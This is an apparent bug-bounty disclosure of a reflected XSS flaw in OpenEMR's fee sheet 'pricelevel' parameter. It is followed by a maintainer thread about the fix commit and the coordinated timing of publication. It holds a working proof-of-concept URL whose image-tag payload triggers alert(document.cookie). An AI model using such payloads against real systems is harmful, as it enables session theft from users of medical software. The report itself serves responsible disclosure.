Cross-site Scripting - Reflected in openemr/openemr
Reported on
Aug 2nd 2022
Description
The pricelevel
parameter in openemr is vulnerable to reflected XSS
Proof of Concept
- Open the web browser to access the website
- Access the url:
http://openemr.vn/interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E
--> Alert box will pop up
Image
https://drive.google.com/file/d/1zLXx2NGmUXZEvgk-dlUeJ-3Sq4cLPIMX/view
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
References
Thanks for the report. A preliminary fix has been posted in commit 59458bc15ab0cb556c521de9d5187167d6f88945
Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 1-3 weeks. After I do that, then will be ok to make CVE # and make it public.
Thanks!
Thank Brady, please let me know once the patch is released.
OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.